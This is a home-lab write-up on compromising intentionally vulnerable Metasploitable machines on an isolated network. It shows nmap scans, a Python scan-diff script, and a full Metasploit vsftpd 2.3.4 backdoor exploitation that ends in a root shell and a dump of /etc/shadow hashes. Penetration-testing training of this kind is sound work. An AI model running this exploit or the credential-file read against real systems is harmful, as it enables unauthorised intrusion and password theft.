Raiding "Metasploitable"

This assignment is based on the "Metasploitable" machines, which are purposely built with vulnerabilities, and uses the Metasploit Framework as the means of hacking into them, aided by NMAP for discovery and by the protocols' own client programs to verify that the machines really have been compromised.

The home lab is set up in VirtualBox on a machine with no connection to the internet, so it poses no threat to any other network.

This was done by disabling the host machine's network cards and attaching the following machines to the VirtualBox Host-Only Ethernet Adapter so that they can reach each other and nothing else: the attack machine, Kali Linux, and the victim machines "Metasploitable" 2 (Ubuntu Linux with a 2.6.x kernel), "Metasploitable" 3 Windows Server 2008 and "Metasploitable" 3 Linux (Ubuntu 14.04).

Note: make sure every virtual machine is attached to the same VirtualBox Host-Only Ethernet Adapter; each host-only adapter is its own subnet, so machines on different ones will not see each other.

These settings can be verified by pinging every host from the others or, more directly, by doing the first part of this home lab assignment: scanning the network.

Scanning

Scan the entire network with a Wireshark packet capture running.

Different scans can be performed: for example, one with the default parameters and another that also reports the version of the service behind each open port and tries to fingerprint the operating system (-sV for version detection, or -A, which bundles version detection, OS detection, default NSE scripts and traceroute). Timing can be adjusted as well, for instance with -T0 ("paranoid"), which sends one probe at a time and waits five minutes between probes to avoid being flagged as an active scan; at that rate the default 1000 ports take roughly three and a half days per host, so it is not used here.

Instead, the NMAP scan is first run with the default values, then with -A, which shows which version of each service is in use, and finally as a SYN scan (-sS), the flag usually described as the "stealth" scan. These are shown separately but could be done in one go by combining the flags in a single command. Two caveats about what the outputs below actually mean. First, run as an unprivileged user, as in the first two scans, nmap falls back to a full TCP connect scan (-sT), and the raw-socket OS fingerprinting part of -A is not available, which is why no "OS details" line appears in the -A output; the OS information there comes from service banners and the smb-os-discovery script. -sS needs raw sockets and therefore sudo. Second, a SYN scan is stealthy only in the sense that it never completes the handshake (SYN, SYN/ACK, RST in the Wireshark capture instead of SYN, SYN/ACK, ACK), so the target service never sees a connection; the probes themselves are just as visible to a network IDS.

NMAP Default Scan

┌──(kali㉿kali)-[~]
└─$ nmap 192.168.56.100/24                                                                                                                                          1 ⚙
Starting Nmap 7.91 ( https://nmap.org ) at 2021-09-16 10:26 EDT
mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers
Nmap scan report for 192.168.56.101
Host is up (0.012s latency).
Not shown: 980 filtered ports
PORT     STATE SERVICE
21/tcp   open  ftp
22/tcp   open  ssh
23/tcp   open  telnet
25/tcp   open  smtp
53/tcp   open  domain
80/tcp   open  http
111/tcp  open  rpcbind
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
512/tcp  open  exec
514/tcp  open  shell
1099/tcp open  rmiregistry
2049/tcp open  nfs
2121/tcp open  ccproxy-ftp
3306/tcp open  mysql
5432/tcp open  postgresql
5900/tcp open  vnc
6000/tcp open  X11
6667/tcp open  irc
8009/tcp open  ajp13

Nmap scan report for 192.168.56.105
Host is up (0.014s latency).
Not shown: 981 filtered ports
PORT      STATE SERVICE
21/tcp    open  ftp
22/tcp    open  ssh
80/tcp    open  http
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
3306/tcp  open  mysql
3389/tcp  open  ms-wbt-server
7676/tcp  open  imqbrokerd
8080/tcp  open  http-proxy
8181/tcp  open  intermapper
8383/tcp  open  m2mservices
9200/tcp  open  wap-wsp
49152/tcp open  unknown
49154/tcp open  unknown
49155/tcp open  unknown
49156/tcp open  unknown
49158/tcp open  unknown
49159/tcp open  unknown

Nmap scan report for 192.168.56.106
Host is up (0.011s latency).
Not shown: 993 filtered ports
PORT     STATE SERVICE
21/tcp   open  ftp
22/tcp   open  ssh
80/tcp   open  http
445/tcp  open  microsoft-ds
631/tcp  open  ipp
3306/tcp open  mysql
8080/tcp open  http-proxy

Nmap done: 256 IP addresses (3 hosts up) scanned in 23.14 seconds

NMAP Scan with OS Discovery

Metasploitable 2

┌──(kali㉿kali)-[~]
└─$ nmap -A 192.168.56.101                                                                       

Starting Nmap 7.91 ( https://nmap.org ) at 2021-09-16 10:44 EDT
mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers
Nmap scan report for 192.168.56.101
Host is up (0.023s latency).
Not shown: 978 filtered ports
PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to 192.168.56.1
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      vsFTPd 2.3.4 - secure, fast, stable
|_End of status
22/tcp   open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey: 
|   1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_  2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
23/tcp   open  telnet      Linux telnetd
25/tcp   open  smtp        Postfix smtpd
|_smtp-commands: metasploitable.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, 
| ssl-cert: Subject: commonName=ubuntu804-base.localdomain/organizationName=OCOSA/stateOrProvinceName=There is no such thing outside US/countryName=XX
| Not valid before: 2010-03-17T14:07:45
|_Not valid after:  2010-04-16T14:07:45
|_ssl-date: 2021-09-14T16:04:27+00:00; -1d22h43m35s from scanner time.
| sslv2: 
|   SSLv2 supported
|   ciphers: 
|     SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
|     SSL2_RC4_128_EXPORT40_WITH_MD5
|     SSL2_DES_64_CBC_WITH_MD5
|     SSL2_RC2_128_CBC_WITH_MD5
|     SSL2_RC4_128_WITH_MD5
|_    SSL2_DES_192_EDE3_CBC_WITH_MD5
53/tcp   open  domain      ISC BIND 9.4.2
| dns-nsid: 
|_  bind.version: 9.4.2
80/tcp   open  http        Apache httpd 2.2.8 ((Ubuntu) DAV/2)
|_http-server-header: Apache/2.2.8 (Ubuntu) DAV/2
|_http-title: Metasploitable2 - Linux
111/tcp  open  rpcbind     2 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2            111/tcp   rpcbind
|   100000  2            111/udp   rpcbind
|   100003  2,3,4       2049/tcp   nfs
|   100003  2,3,4       2049/udp   nfs
|   100005  1,2,3      40753/tcp   mountd
|   100005  1,2,3      50603/udp   mountd
|   100021  1,3,4      54257/udp   nlockmgr
|   100021  1,3,4      57277/tcp   nlockmgr
|   100024  1          47011/tcp   status
|_  100024  1          52545/udp   status
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
512/tcp  open  exec        netkit-rsh rexecd
513/tcp  open  login?
514/tcp  open  shell       Netkit rshd
1099/tcp open  java-rmi    GNU Classpath grmiregistry
1524/tcp open  bindshell   Metasploitable root shell
2049/tcp open  nfs         2-4 (RPC #100003)
2121/tcp open  ftp         ProFTPD 1.3.1
3306/tcp open  mysql       MySQL 5.0.51a-3ubuntu5
| mysql-info: 
|   Protocol: 10
|   Version: 5.0.51a-3ubuntu5
|   Thread ID: 10
|   Capabilities flags: 43564
|   Some Capabilities: LongColumnFlag, ConnectWithDatabase, SwitchToSSLAfterHandshake, SupportsTransactions, Speaks41ProtocolNew, Support41Auth, SupportsCompression
|   Status: Autocommit
|_  Salt: YKM!X{#7.|J;*]v[E&.R
5900/tcp open  vnc         VNC (protocol 3.3)
| vnc-info: 
|   Protocol version: 3.3
|   Security types: 
|_    VNC Authentication (2)
6000/tcp open  X11         (access denied)
6667/tcp open  irc         UnrealIRCd
8009/tcp open  ajp13       Apache Jserv (Protocol v1.3)
|_ajp-methods: Failed to get a valid response for the OPTION request
8180/tcp open  http        Apache Tomcat/Coyote JSP engine 1.1
|_http-favicon: Apache Tomcat
|_http-server-header: Apache-Coyote/1.1
|_http-title: Apache Tomcat/5.5
Service Info: Hosts:  metasploitable.localdomain, irc.Metasploitable.LAN; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: -1d21h23m35s, deviation: 2h18m34s, median: -1d22h43m35s
|_nbstat: NetBIOS name: METASPLOITABLE, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery: 
|   OS: Unix (Samba 3.0.20-Debian)
|   Computer name: metasploitable
|   NetBIOS computer name: 
|   Domain name: localdomain
|   FQDN: metasploitable.localdomain
|_  System time: 2021-09-14T12:03:10-04:00
| smb-security-mode: 
|   account_used: <blank>
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_smb2-time: Protocol negotiation failed (SMB2)

Windows Server 2008

┌──(kali㉿kali)-[~]
└─$ nmap -A 192.168.56.105       

Starting Nmap 7.91 ( https://nmap.org ) at 2021-09-16 10:48 EDT
mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers
Nmap scan report for 192.168.56.105
Host is up (0.019s latency).
Not shown: 978 filtered ports
PORT      STATE SERVICE              VERSION
21/tcp    open  ftp                  Microsoft ftpd
| ftp-syst: 
|_  SYST: Windows_NT
22/tcp    open  ssh                  OpenSSH 7.1 (protocol 2.0)
| ssh-hostkey: 
|   2048 b0:04:32:f0:fd:4b:a4:24:1b:ab:ff:c6:94:47:0d:a4 (RSA)
|_  521 2e:56:c1:dc:51:c9:44:28:f1:4b:fc:83:73:9d:74:75 (ECDSA)
80/tcp    open  http                 Microsoft IIS httpd 7.5
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: Site doesn't have a title (text/html).
135/tcp   open  msrpc                Microsoft Windows RPC
139/tcp   open  netbios-ssn          Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds         Windows Server 2008 R2 Standard 7601 Service Pack 1 microsoft-ds
3306/tcp  open  mysql                MySQL 5.5.20-log
| mysql-info: 
|   Protocol: 10
|   Version: 5.5.20-log
|   Thread ID: 7
|   Capabilities flags: 63487
|   Some Capabilities: IgnoreSpaceBeforeParenthesis, DontAllowDatabaseTableColumn, SupportsLoadDataLocal, ODBCClient, IgnoreSigpipes, InteractiveClient, LongPassword, LongColumnFlag, ConnectWithDatabase, FoundRows, SupportsTransactions, Speaks41ProtocolNew, Support41Auth, Speaks41ProtocolOld, SupportsCompression, SupportsMultipleResults, SupportsAuthPlugins, SupportsMultipleStatments
|   Status: Autocommit
|   Salt: B/_sFAQV;ekiO0>)Q;sU
|_  Auth Plugin Name: mysql_native_password
3389/tcp  open  ssl/ms-wbt-server?
| rdp-ntlm-info: 
|   Target_Name: VAGRANT-2008R2
|   NetBIOS_Domain_Name: VAGRANT-2008R2
|   NetBIOS_Computer_Name: VAGRANT-2008R2
|   DNS_Domain_Name: vagrant-2008R2
|   DNS_Computer_Name: vagrant-2008R2
|   Product_Version: 6.1.7601
|_  System_Time: 2021-09-16T14:47:07+00:00
| ssl-cert: Subject: commonName=vagrant-2008R2
| Not valid before: 2021-08-29T15:37:48
|_Not valid after:  2022-02-28T15:37:48
|_ssl-date: 2021-09-16T14:47:54+00:00; +18s from scanner time.
4848/tcp  open  ssl/http             Oracle Glassfish Application Server
|_http-server-header: GlassFish Server Open Source Edition  4.0 
|_http-title: Login
| ssl-cert: Subject: commonName=localhost/organizationName=Oracle Corporation/stateOrProvinceName=California/countryName=US
| Not valid before: 2013-05-15T05:33:38
|_Not valid after:  2023-05-13T05:33:38
|_ssl-date: 2021-09-16T14:47:54+00:00; +18s from scanner time.
7676/tcp  open  java-message-service Java Message Service 301
8080/tcp  open  http                 Sun GlassFish Open Source Edition  4.0
| http-methods: 
|_  Potentially risky methods: PUT DELETE TRACE
|_http-open-proxy: Proxy might be redirecting requests
|_http-server-header: GlassFish Server Open Source Edition  4.0 
|_http-title: GlassFish Server - Server Running
8181/tcp  open  ssl/http             Oracle GlassFish 4.0 (Servlet 3.1; JSP 2.3; Java 1.8)
| http-methods: 
|_  Potentially risky methods: PUT DELETE TRACE
|_http-server-header: GlassFish Server Open Source Edition  4.0 
|_http-title: GlassFish Server - Server Running
| ssl-cert: Subject: commonName=localhost/organizationName=Oracle Corporation/stateOrProvinceName=California/countryName=US
| Not valid before: 2013-05-15T05:33:38
|_Not valid after:  2023-05-13T05:33:38
|_ssl-date: 2021-09-16T14:47:54+00:00; +18s from scanner time.
8383/tcp  open  ssl/http             Apache httpd
|_http-server-header: Apache
|_http-title: 503 Service Unavailable
| ssl-cert: Subject: commonName=Desktop Central/organizationName=Zoho Corporation/stateOrProvinceName=CA/countryName=US
| Not valid before: 2010-09-08T12:24:44
|_Not valid after:  2020-09-05T12:24:44
|_ssl-date: TLS randomness does not represent time
9200/tcp  open  wap-wsp?
| fingerprint-strings: 
|   FourOhFourRequest: 
|     HTTP/1.0 400 Bad Request
|     Content-Type: text/plain; charset=UTF-8
|     Content-Length: 80
|     handler found for uri [/nice%20ports%2C/Tri%6Eity.txt%2ebak] and method [GET]
|   GetRequest: 
|     HTTP/1.0 200 OK
|     Content-Type: application/json; charset=UTF-8
|     Content-Length: 306
|     "status" : 200,
|     "name" : "Cypher",
|     "version" : {
|     "number" : "1.1.1",
|     "build_hash" : "f1585f096d3f3985e73456debdc1a0745f512bbc",
|     "build_timestamp" : "2014-04-16T14:27:12Z",
|     "build_snapshot" : false,
|     "lucene_version" : "4.7"
|     "tagline" : "You Know, for Search"
|   HTTPOptions: 
|     HTTP/1.0 200 OK
|     Content-Type: text/plain; charset=UTF-8
|     Content-Length: 0
|   RTSPRequest, SIPOptions: 
|     HTTP/1.1 200 OK
|     Content-Type: text/plain; charset=UTF-8
|_    Content-Length: 0
49152/tcp open  msrpc                Microsoft Windows RPC
49153/tcp open  msrpc                Microsoft Windows RPC
49154/tcp open  msrpc                Microsoft Windows RPC
49155/tcp open  msrpc                Microsoft Windows RPC
49156/tcp open  msrpc                Microsoft Windows RPC
49157/tcp open  msrpc                Microsoft Windows RPC
49158/tcp open  java-rmi             Java RMI
49159/tcp open  tcpwrapped
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port9200-TCP:V=7.91%I=7%D=9/16%Time=61435874%P=x86_64-pc-linux-gnu%r(Ge
SF:tRequest,189,"HTTP/1\.0\x20200\x20OK\r\nContent-Type:\x20application/js
SF:on;\x20charset=UTF-8\r\nContent-Length:\x20306\r\n\r\n{\r\n\x20\x20\"st
SF:atus\"\x20:\x20200,\r\n\x20\x20\"name\"\x20:\x20\"Cypher\",\r\n\x20\x20
SF:\"version\"\x20:\x20{\r\n\x20\x20\x20\x20\"number\"\x20:\x20\"1\.1\.1\"
SF:,\r\n\x20\x20\x20\x20\"build_hash\"\x20:\x20\"f1585f096d3f3985e73456deb
SF:dc1a0745f512bbc\",\r\n\x20\x20\x20\x20\"build_timestamp\"\x20:\x20\"201
SF:4-04-16T14:27:12Z\",\r\n\x20\x20\x20\x20\"build_snapshot\"\x20:\x20fals
SF:e,\r\n\x20\x20\x20\x20\"lucene_version\"\x20:\x20\"4\.7\"\r\n\x20\x20},
SF:\r\n\x20\x20\"tagline\"\x20:\x20\"You\x20Know,\x20for\x20Search\"\r\n}\
SF:n")%r(HTTPOptions,4F,"HTTP/1\.0\x20200\x20OK\r\nContent-Type:\x20text/p
SF:lain;\x20charset=UTF-8\r\nContent-Length:\x200\r\n\r\n")%r(RTSPRequest,
SF:4F,"HTTP/1\.1\x20200\x20OK\r\nContent-Type:\x20text/plain;\x20charset=U
SF:TF-8\r\nContent-Length:\x200\r\n\r\n")%r(FourOhFourRequest,A9,"HTTP/1\.
SF:0\x20400\x20Bad\x20Request\r\nContent-Type:\x20text/plain;\x20charset=U
SF:TF-8\r\nContent-Length:\x2080\r\n\r\nNo\x20handler\x20found\x20for\x20u
SF:ri\x20\[/nice%20ports%2C/Tri%6Eity\.txt%2ebak\]\x20and\x20method\x20\[G
SF:ET\]")%r(SIPOptions,4F,"HTTP/1\.1\x20200\x20OK\r\nContent-Type:\x20text
SF:/plain;\x20charset=UTF-8\r\nContent-Length:\x200\r\n\r\n");
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 1h00m18s, deviation: 2h38m45s, median: 17s
|_nbstat: NetBIOS name: VAGRANT-2008R2, NetBIOS user: <unknown>, NetBIOS MAC: 08:00:27:b8:13:22 (Oracle VirtualBox virtual NIC)
| smb-os-discovery: 
|   OS: Windows Server 2008 R2 Standard 7601 Service Pack 1 (Windows Server 2008 R2 Standard 6.1)
|   OS CPE: cpe:/o:microsoft:windows_server_2008::sp1
|   Computer name: vagrant-2008R2
|   NetBIOS computer name: VAGRANT-2008R2\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2021-09-16T07:47:06-07:00
| smb-security-mode: 
|   account_used: <blank>
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2021-09-16T14:47:14
|_  start_date: 2021-09-14T15:41:37

Linux 14.04

┌──(kali㉿kali)-[~]
└─$ nmap -A 192.168.56.106

Starting Nmap 7.91 ( https://nmap.org ) at 2021-09-17 10:55 EDT
mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers
Nmap scan report for 192.168.56.106
Host is up (0.013s latency).
Not shown: 994 filtered ports
PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         ProFTPD 1.3.5
22/tcp   open  ssh         OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.13 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 2b:2e:1f:a4:54:26:87:76:12:26:59:58:0d:da:3b:04 (DSA)
|   2048 c9:ac:70:ef:f8:de:8b:a3:a3:44:ab:3d:32:0a:5c:6a (RSA)
|   256 c0:49:cc:18:7b:27:a4:07:0d:2a:0d:bb:42:4c:36:17 (ECDSA)
|_  256 a0:76:f3:76:f8:f0:70:4d:09:ca:e1:10:fd:a9:cc:0a (ED25519)
80/tcp   open  http        Apache httpd 2.4.7 ((Ubuntu))
| http-ls: Volume /
| SIZE  TIME              FILENAME
| -     2020-10-29 19:37  chat/
| -     2011-07-27 20:17  drupal/
| 1.7K  2020-10-29 19:37  payroll_app.php
| -     2013-04-08 12:06  phpmyadmin/
|_
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Index of /
445/tcp  open  netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
3306/tcp open  mysql       MySQL (unauthorized)
|_tls-nextprotoneg: ERROR: Script execution failed (use -d to debug)
8080/tcp open  http        Jetty 8.1.7.v20120910
|_http-server-header: Jetty(8.1.7.v20120910)
|_http-title: Error 404 - Not Found
Service Info: Host: METASPLOITABLE3-UB1404; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: 19s, deviation: 3s, median: 17s
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
|   Computer name: metasploitable3-ub1404
|   NetBIOS computer name: METASPLOITABLE3-UB1404\x00
|   Domain name: \x00
|   FQDN: metasploitable3-ub1404
|_  System time: 2021-09-16T14:47:10+00:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2021-09-16T14:47:15
|_  start_date: N/A

Post-scan script results:
| clock-skew: 
|   1h00m18s: 
|     192.168.56.105
|_    192.168.56.106
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 256 IP addresses (3 hosts up) scanned in 242.59 seconds

NMAP Stealth Scan

Metasploitable 2

┌──(kali㉿kali)-[~]
└─$ sudo nmap -sS  192.168.56.101                                                                               1 ⚙
Starting Nmap 7.91 ( https://nmap.org ) at 2021-09-17 11:21 EDT
mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers
Nmap scan report for 192.168.56.101
Host is up (0.0034s latency).
Not shown: 977 filtered ports
PORT     STATE SERVICE
21/tcp   open  ftp
22/tcp   open  ssh
23/tcp   open  telnet
25/tcp   open  smtp
53/tcp   open  domain
80/tcp   open  http
111/tcp  open  rpcbind
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
512/tcp  open  exec
513/tcp  open  login
514/tcp  open  shell
1099/tcp open  rmiregistry
1524/tcp open  ingreslock
2049/tcp open  nfs
2121/tcp open  ccproxy-ftp
3306/tcp open  mysql
5432/tcp open  postgresql
5900/tcp open  vnc
6000/tcp open  X11
6667/tcp open  irc
8009/tcp open  ajp13
8180/tcp open  unknown

Nmap done: 1 IP address (1 host up) scanned in 4.60 seconds

Windows Server 2008

┌──(kali㉿kali)-[~]
└─$ sudo nmap -sS  192.168.56.105                                                                               

Starting Nmap 7.91 ( https://nmap.org ) at 2021-09-17 11:25 EDT
mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers
Nmap scan report for 192.168.56.105
Host is up (0.0030s latency).
Not shown: 982 filtered ports
PORT      STATE SERVICE
21/tcp    open  ftp
22/tcp    open  ssh
80/tcp    open  http
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
3306/tcp  open  mysql
3389/tcp  open  ms-wbt-server
4848/tcp  open  appserv-http
7676/tcp  open  imqbrokerd
8080/tcp  open  http-proxy
8181/tcp  open  intermapper
8383/tcp  open  m2mservices
9200/tcp  open  wap-wsp
49152/tcp open  unknown
49153/tcp open  unknown
49154/tcp open  unknown
49155/tcp open  unknown

Nmap done: 1 IP address (1 host up) scanned in 4.96 seconds

Linux 14.04

┌──(kali㉿kali)-[~]
└─$ sudo nmap -sS  192.168.56.106                                                                               

Starting Nmap 7.91 ( https://nmap.org ) at 2021-09-17 11:23 EDT
mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers
Nmap scan report for 192.168.56.106
Host is up (0.0025s latency).
Not shown: 993 filtered ports
PORT     STATE SERVICE
21/tcp   open  ftp
22/tcp   open  ssh
80/tcp   open  http
445/tcp  open  microsoft-ds
631/tcp  open  ipp
3306/tcp open  mysql
8080/tcp open  http-proxy

Nmap done: 1 IP address (1 host up) scanned in 4.92 seconds
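The default and SYN scans above do not list exactly the same ports on every host, and the difference is easy to miss by eye across 1000-line pastes. As an added example (not part of the original write-up), the following Python parses nmap's normal output format into a host/port table and diffs two scans of one host. The two samples are copied from the default scan and the SYN scan of the Windows host shown above, trimmed to the header and port table; in a real engagement you would save the scans with -oX and parse the XML instead, but this handles the text exactly as pasted here.

```python
"""Parse nmap normal-format output and diff two scans of one host.

Added example; it is not part of the original lab write-up. The two samples
are copied from the default (unprivileged, TCP connect) scan and the sudo
SYN scan of the Windows host shown above, trimmed to header and port table.
"""
import re
from collections import defaultdict

HOST_RE = re.compile(r"^Nmap scan report for (\S+)")
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)")

DEFAULT_SCAN = """\
Nmap scan report for 192.168.56.105
Host is up (0.014s latency).
Not shown: 981 filtered ports
PORT      STATE SERVICE
21/tcp    open  ftp
22/tcp    open  ssh
80/tcp    open  http
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
3306/tcp  open  mysql
3389/tcp  open  ms-wbt-server
7676/tcp  open  imqbrokerd
8080/tcp  open  http-proxy
8181/tcp  open  intermapper
8383/tcp  open  m2mservices
9200/tcp  open  wap-wsp
49152/tcp open  unknown
49154/tcp open  unknown
49155/tcp open  unknown
49156/tcp open  unknown
49158/tcp open  unknown
49159/tcp open  unknown
"""

SYN_SCAN = """\
Nmap scan report for 192.168.56.105
Host is up (0.0030s latency).
Not shown: 982 filtered ports
PORT      STATE SERVICE
21/tcp    open  ftp
22/tcp    open  ssh
80/tcp    open  http
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
3306/tcp  open  mysql
3389/tcp  open  ms-wbt-server
4848/tcp  open  appserv-http
7676/tcp  open  imqbrokerd
8080/tcp  open  http-proxy
8181/tcp  open  intermapper
8383/tcp  open  m2mservices
9200/tcp  open  wap-wsp
49152/tcp open  unknown
49153/tcp open  unknown
49154/tcp open  unknown
49155/tcp open  unknown
"""


def parse_nmap(text):
    """Return {host: {(port, proto): (state, service)}} from normal-format output."""
    hosts = defaultdict(dict)
    current = None
    for line in text.splitlines():
        m = HOST_RE.match(line)
        if m:
            current = m.group(1)        # every port line until the next report belongs here
            continue
        m = PORT_RE.match(line)
        if m and current is not None:
            port, proto, state, service = m.groups()
            hosts[current][(int(port), proto)] = (state, service)
    return dict(hosts)


def diff_scans(old, new, host):
    """(open in new only, open in old only) for one host, each sorted."""
    old_open = {k for k, (state, _) in old.get(host, {}).items() if state == "open"}
    new_open = {k for k, (state, _) in new.get(host, {}).items() if state == "open"}
    return sorted(new_open - old_open), sorted(old_open - new_open)


if __name__ == "__main__":
    appeared, vanished = diff_scans(parse_nmap(DEFAULT_SCAN), parse_nmap(SYN_SCAN),
                                    "192.168.56.105")
    print("open in SYN scan only:    ", appeared)
    print("open in default scan only:", vanished)
```

Run against the two pastes, the diff reports 4848/tcp and 49153/tcp as open only in the SYN scan, and 49156, 49158 and 49159 as open only in the default scan. Differences like these deserve a re-check rather than an explanation: 4848 is the GlassFish admin console that the -A scan identified, and the 49xxx ports are Windows dynamic RPC endpoints whose numbers change as services restart, so a port that "disappears" between scans is not necessarily closed.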

Gaining Access

Breach all the machines with a Wireshark packet capture running.

Metasploitable 2

There is an interesting version of FTP running on port 21: vsftpd 2.3.4. The scan output also shows that anonymous FTP login is allowed, so a client could get in without any real credentials. However, for this assignment Metasploit is the framework used to gain access to, and then persistence on, the vulnerable machines. Once inside the Metasploit framework, a quick search on the version of FTP running turns up a fitting exploit.

msf6 > search vsftpd

Matching Modules
================

   #  Name                                  Disclosure Date  Rank       Check  Description
   -  ----                                  ---------------  ----       -----  -----------
   0  exploit/unix/ftp/vsftpd_234_backdoor  2011-07-03       excellent  No     VSFTPD v2.3.4 Backdoor Command Execution


Interact with a module by name or index. For example info 0, use 0 or use exploit/unix/ftp/vsftpd_234_backdoor

Checking the explicit version, the exploit listed in Metasploit targets vsftpd 2.3.4, exactly the version the -A scan reported on port 21. Select the exploit, show its options, set the target host and launch the attack. The module works by sending a username containing the string ":)" to the backdoored server, which responds by opening a root shell on TCP port 6200; Metasploit then connects to that port, which is why the session below is opened on port 6200 rather than 21.

msf6 > use 0
[*] No payload configured, defaulting to cmd/unix/interact
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > options

Module options (exploit/unix/ftp/vsftpd_234_backdoor):

   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   RHOSTS                   yes       The target host(s)
   RPORT   21               yes       The target port (TCP)


Payload options (cmd/unix/interact):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set RHOSTS 192.168.56.101
RHOSTS => 192.168.56.101
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > run

[*] 192.168.56.101:21 - Banner: 220 (vsFTPd 2.3.4)
[*] 192.168.56.101:21 - USER: 331 Please specify the password.
[+] 192.168.56.101:21 - Backdoor service has been spawned, handling...
[+] 192.168.56.101:21 - UID: uid=0(root) gid=0(root)
[*] Found shell.
[*] Command shell session 1 opened (0.0.0.0:0 -> 192.168.56.101:6200) at 2021-09-06 05:13:18 -0400

whoami
root

hostname
metasploitable

cat /etc/shadow 
root:$1$/avpfBJ1$x0z8w5UF9Iv./DR9E9Lid.:14747:0:99999:7:::
daemon:*:14684:0:99999:7:::
bin:*:14684:0:99999:7:::
sys:$1$fUX6BPOt$Miyc3UpOzQJqz4s5wFD9l0:14742:0:99999:7:::
sync:*:14684:0:99999:7:::
games:*:14684:0:99999:7:::
man:*:14684:0:99999:7:::
lp:*:14684:0:99999:7:::
mail:*:14684:0:99999:7:::
news:*:14684:0:99999:7:::
uucp:*:14684:0:99999:7:::
proxy:*:14684:0:99999:7:::
www-data:*:14684:0:99999:7:::
backup:*:14684:0:99999:7:::
list:*:14684:0:99999:7:::
irc:*:14684:0:99999:7:::
gnats:*:14684:0:99999:7:::
nobody:*:14684:0:99999:7:::
libuuid:!:14684:0:99999:7:::
dhcp:*:14684:0:99999:7:::
syslog:*:14684:0:99999:7:::
klog:$1$f2ZVMS4K$R9XkI.CmLdHhdUE3X9jqP0:14742:0:99999:7:::
sshd:*:14684:0:99999:7:::
msfadmin:$1$XN10Zj2c$Rt/zzCW3mLtUWA.ihZjA5/:14684:0:99999:7:::
bind:*:14685:0:99999:7:::
postfix:*:14685:0:99999:7:::
ftp:*:14685:0:99999:7:::
postgres:$1$Rw35ik.x$MgQgZUuO5pAoUvfJhfcYe/:14685:0:99999:7:::
mysql:!:14685:0:99999:7:::
tomcat55:*:14691:0:99999:7:::
distccd:*:14698:0:99999:7:::
user:$1$HESu9xrH$k.o3G93DGoXIiQKkPmUgZ0:14699:0:99999:7:::
service:$1$kR3ue7JZ$7GxELDupr5Ohp6cjZ3Bu//:14715:0:99999:7:::
telnetd:*:14715:0:99999:7:::
